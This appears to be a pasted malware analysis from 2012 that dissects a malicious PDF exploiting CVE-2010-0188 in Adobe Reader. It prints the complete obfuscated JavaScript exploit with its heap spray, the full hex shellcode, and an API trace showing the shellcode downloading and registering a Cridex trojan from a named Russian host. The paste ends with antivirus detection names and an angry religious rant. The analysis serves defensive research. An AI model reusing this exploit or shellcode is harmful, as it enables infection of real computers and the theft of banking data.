_j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_j7,'');if(_ll2.length%2)_ll2+=unescape('%00');_ll3=_j2(_ll2);with({k:_ll3})_I0(k);ImageField1.rawValue=_ll1}_j3();
  253.  
  254.  
  255. //We make it beautiful to read as per below:  ;-)
  256.  
  257.  app.alert = event.target.creationDate.split('|')[1].replace(/; /g, '');
  258.  var padding;
  259.  var bbb, ccc, ddd, eee, fff, ggg, hhh;
  260.  var pointers_a, i;
  261.  var x = new Array();
  262.  var y = new Array();
  263.  var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  264.  var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  265.  _l3 = app;
  266.  _l4 = new Array();
  267.  function _l5()
  268.  {
  269.    var _l6 = _l3.viewerVersion.toString();
  270.    _l6 = _l6.replace('.', '');
  271.    while (_l6.length < 4)_l6 += '0';
  272.    return parseInt(_l6, 10)
  273.  }
  274.  function _l7(_l8, _l9)
  275.  {
  276.    while (_l8.length * 2 < _l9)_l8 += _l8;
  277.    return _l8.substring(0, _l9 / 2)
  278.  }
  279.  function _I0(_I1)
  280.  {
  281.    _I1 = unescape(_I1);
  282.    roteDak = _I1.length * 2;
  283.    dakRote = unescape('%u9090');
  284.    spray = _l7(dakRote, 0x2000 - roteDak);
  285.    loxWhee = _I1 + spray;
  286.    loxWhee = _l7(loxWhee, 524098);
  287.    for (i = 0; i < 400; i ++ )_l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
  288.  }
  289.  function _I2(_I1, len)
  290.  {
  291.    while (_I1.length < len)_I1 += _I1;
  292.    return _I1.substring(0, len)
  293.  }
  294.  function _I3(_I1)
  295.  {
  296.    ret = '';
  297.    for (i = 0; i < _I1.length; i += 2)
  298.    {
  299.      b = _I1.substr(i, 2);
  300.      c = parseInt(b, 16);
  301.      ret += String.fromCharCode(c);
  302.    }
  303.    return ret
  304.  }
  305.  function _ji1(_I1, _I4)
  306.  {
  307.    _I5 = '';
  308.    for (_I6 = 0; _I6 < _I1.length; _I6 ++ )
  309.    {
  310.      _l9 = _I4.length;
  311.      _I7 = _I1.charCodeAt(_I6);
  312.      _I8 = _I4.charCodeAt(_I6 % _l9);
  313.      _I5 += String.fromCharCode(_I7 ^ _I8);
  314.    }
  315.    return _I5
  316.  }
  317.  function _I9(_I6)
  318.  {
  319.    _j0 = _I6.toString(16);
  320.    _j1 = _j0.length;
  321.    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
  322.    return _I5
  323.  }
  324.  function _j2(_I1)
  325.  {
  326.    _I5 = '';
  327.    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
  328.    {
  329.      _I5 += '%u';
  330.      _I5 += _I9(_I1.charCodeAt(_I6 + 1));
  331.      _I5 += _I9(_I1.charCodeAt(_I6))
  332.    }
  333.    return _I5
  334.  }
  335.  function _j3()
  336.  {
  337.    _j4 = _l5();
  338.    if (_j4 < 9000)
  339.    {
  340.      _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  341.      _j6 = _l1;
  342.      _j7 = _I3(_j6)
  343.    }
  344.    else
  345.    {
  346.      _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  347.      _j6 = _l2;
  348.      _j7 = _I3(_j6)
  349.    }
  350.    _j8 = 'SUkqADggAABB';
  351.    _j9 = _I2('QUFB', 10984);
  352.    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  353.    _ll1 = _j8 + _j9 + _ll0 + _j5;
  354.    _ll2 = _ji1(_j7, '');
  355.    if (_ll2.length % 2)_ll2 += unescape('%00');
  356.    _ll3 = _j2(_ll2);
  357.    with (
  358.    {
  359.      k : _ll3
  360.    }
  361.    )_I0(k);
  362.    ImageField1.rawValue = _ll1
  363.  }
  364.  _j3();
  365.  
  366.  
  367.  
  368. ====================================
  369.  
  370. EXPLOIT IS DETECTED IN....
  371.  
  372. =====================================
  373.  
  374. // Oh, see the code of "ImageField1.rawValue" near the end of the script,
  375. // It is the method used to exploit Libtiff integer overflow in Adobe Reader and Acrobat (PoC)
  376. // CVE-2010-0188, the below function is the actual code be used for this exploitation:
  377.  
  378.  function _j3()
  379.  {
  380.    _j4 = _l5();
  381.    if (_j4 < 9000)
  382.    {
  383.      _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  384.      _j6 = _l1;
  385.      _j7 = _I3(_j6)
  386.    }
  387.    else
  388.    {
  389.      _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  390.      _j6 = _l2;
  391.      _j7 = _I3(_j6)
  392.    }
  393.    _j8 = 'SUkqADggAABB';
  394.    _j9 = _I2('QUFB', 10984);
  395.    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  396.    _ll1 = _j8 + _j9 + _ll0 + _j5;
  397.    _ll2 = _ji1(_j7, '');
  398.    if (_ll2.length % 2)_ll2 += unescape('%00');
  399.    _ll3 = _j2(_ll2);
  400.    with (
  401.    {
  402.      k : _ll3
  403.    }
  404.    )_I0(k);
  405.    ImageField1.rawValue = _ll1
  406.  
  407. // In this case we have a single exploitation only.
  408.  
  409.  
  410. ====================================
  411.  
  412. SHELLCODE DETECTED IN....
  413.  
  414. ; Post-exploit must be followed by infection act
  415. ; method used are usually shellcode,
  416. ; where is it?
  417.  
  418. =====================================
  419.  
  420.  
  421. // See the below code;
  422.  
  423.  app.alert = event.target.creationDate.split('|')[1].replace(/; /g, '');
  424.  var padding;
  425.  var bbb, ccc, ddd, eee, fff, ggg, hhh;
  426.  var pointers_a, i;
  427.  var x = new Array();
  428.  var y = new Array();
  429.  var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  430.  var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.split('|')[1].replace(/; /g, '');
  431.  
  432.  
  433. // it called the SECOND ARRAY OF a; that we splitted before (I wrote it again below:)
  434.  
  435. 6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
  436.  
  437. //with adding the first parts
  438. //with: "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"
  439. // so this is the real shellcode strings will be...
  440.  
  441. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f64656c656d6961746f722e72753a383038302f666f72756d2f6c696e6b732f636f6c756d6e2e7068703f6b73636e68637a3d33303a316e3a31693a31693a3333266973716a743d32763a316b3a316d3a33323a33333a316b3a316b3a33313a316a3a316f26686d786f77783d3169266467616d777278783d6c7466766d267869647570793d6a6a6e71686c0000
  442.  
  443. // These moronz think they are smart enough to split the binary of shellcode,
  444. // but we are smarter.
  445.  
  446. //In the binary editor you can see the shellcode like below:
  447.  
  448. 4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  L.`....J<.`..c.J  
  449. a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  ...J0..Jn/.JAAAA  
  450. 26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  &...............  
  451. 12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  .9.Jd.`.....AAAA  
  452. 41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  AAAAf......u4._3  
  453. c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  .d.@0.@..p.V.v.3  
  454. db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  .f.^<.t3,.......  
  455. 8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  .@0.F9.u..4$..uQ  
  456. e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  ..LQV.u<.t5x..V.  
  457. 76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  v...3.IA....3...  
  458. 10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  .8.t......@..;.u  
  459. e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  .^.^$..f..K.F..T  
  460. 24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  $...........^Y..  
  461. 53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  S..h..}.3t.....h  
  462. 08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  ...j.Y..........  
  463. 00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  ..XPj@h....P...P  
  464. 55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  U...^......hon..  
  465. 68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  hurlmT........a.  
  466. ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  .....r.......\$.  
  467. c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  ..$regs.D$.vr32.  
  468. 44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  D$..-s.Sh.....V.  
  469. 8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  ..3.Q.D..wpbt.D.  
  470. 05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  ..dll.D...Y...0.  
  471. 44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  D..AQj.j.SWj..V.  
  472. 85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  ..u.j.S.V.j....S  
  473. ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  .V........G.?.u.  
  474. 47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  G.?.u.j.j..V....  
  475. ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  ...N.......o..3.  
  476. 8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  .[..Fy6./phttp:/  
  477. 2f 64 65 6c 65 6d 69 61  74 6f 72 2e 72 75 3a 38  /delemiator.ru:8  
  478. 30 38 30 2f 66 6f 72 75  6d 2f 6c 69 6e 6b 73 2f  080/forum/links/  
  479. 63 6f 6c 75 6d 6e 2e 70  68 70 3f 6b 73 63 6e 68  column.php?kscnh  
  480. 63 7a 3d 33 30 3a 31 6e  3a 31 69 3a 31 69 3a 33  cz=30:1n:1i:1i:3  
  481. 33 26 69 73 71 6a 74 3d  32 76 3a 31 6b 3a 31 6d  3&isqjt=2v:1k:1m  
  482. 3a 33 32 3a 33 33 3a 31  6b 3a 31 6b 3a 33 31 3a  :32:33:1k:1k:31:  
  483. 31 6a 3a 31 6f 26 68 6d  78 6f 77 78 3d 31 69 26  1j:1o&hmxowx=1i&  
  484. 64 67 61 6d 77 72 78 78  3d 6c 74 66 76 6d 26 78  dgamwrxx=ltfvm&x  
  485. 69 64 75 70 79 3d 6a 6a  6e 71 68 6c 00 00        idupy=jjnqhl..    
  486.  
  487.  
  488. ================================
  489.  
  490. DOWNLOAD URL OF PAYLOAD
  491. AND INFECTION METHOD....
  492.  
  493. ================================
  494.  
  495. // The url for download the payload, which lead us to Cridex,
  496. // is plainly written in the shellcode as per below URL:
  497. ----------------------------------------
  498. h00p://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl
  499. ----------------------------------------
  500. //↑ here it is this SOB's trying to hide's URL..
  501.  
  502. //The infection performed by this shellcode is
  503. //with API by using OS's component library as kernel32.dll , urlmon.DLL, and regsvr32.exe ,to make an infection
  504. // as per below breakdowns:
  505.  
  506. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
  507. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  508. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  509. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?kscnhcz=30:1n:1i:1i:33&isqjt=2v:1k:1m:32:33:1k:1k:31:1j:1o&hmxowx=1i&dgamwrxx=ltfvm&xidupy=jjnqhl, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  510. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  511. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  512. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  513.  
  514. // It made memory alloc, loading urlmon, downloads the Cridex trojan, saved it,
  515. // executed it, and register it in registry with regsvr32 ...
  516.  
  517. ================================================
  518.  
  519. CURRENT DETECTION OF ANTIVIRUS IS ??
  520.  
  521. ================================================
  522.  
  523. //It has a "not bad detection" VT Score is (20 / 44)
  524. //
  525. // But you'll now know for sure of what exploitation used if you
  526. // hit by this mess, because it shows the below "not so comprehensive" malware names..
  527. // We saw that only F-Secure is making a good name of it.
  528.  
  529. F-Secure                 : Exploit:W32/CVE-2010-0188.B
  530. DrWeb                    : Exploit.PDF.3096
  531. Microsoft                : Exploit:Win32/Pdfjsc.AEB
  532. VIPRE                    : LooksLike.PDF.Malware.c (v)
  533. AntiVir                  : EXP/Pdfjsc.aeb
  534. TrendMicro               : TROJ_PIDIEF.SMWY
  535. McAfee-GW-Edition        : Exploit-PDF!Blacole.o
  536. TrendMicro-HouseCall     : TROJ_GEN.F47V1125
  537. MicroWorld-eScan         : Exploit.TIFF.Gen
  538. Avast                    : JS:Pdfka-gen [Expl]
  539. nProtect                 : Exploit.TIFF.Gen
  540. GData                    : Exploit.TIFF.Gen
  541. Kaspersky                : HEUR:Exploit.Script.Generic
  542. BitDefender              : Exploit.TIFF.Gen
  543. McAfee                   : Exploit-PDF!Blacole.o
  544. ESET-NOD32               : JS/Exploit.Pdfka.PWF
  545. Ikarus                   : Exploit.PDF
  546. AVG                      : Exploit_c.VVV
  547. Sophos                   : Troj/PDFJs-AAS
  548. Comodo                   : TestSignature.JS.Pdfka.FBQ
  549.  
  550.  
  551. // .. We swore,
  552. // .. the sweat, tears & blood  of a crusader in act, is like a martyr.. one died & shall be replaced by 10 more..
  553. // .. bless & glory to those who stick to fight for the truth 'till the end..
  554. // .. shall we be mocked or broken in fighting, the curse is upon you, malware moronz! By the name of God.
  555. // .. with curse that shall last foverer, a curse for those enemies of God..
  556. // ..
  557. // .. Yet,is not too late to stop your evil works. Ask for forgiveness and stop your act.
  558. // ..
  559. ---
  560. #MalwareMustDie
  561. @unixfreaxjp /malware]$ date
  562. Mon Nov 26 21:12:33 JST 2012
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!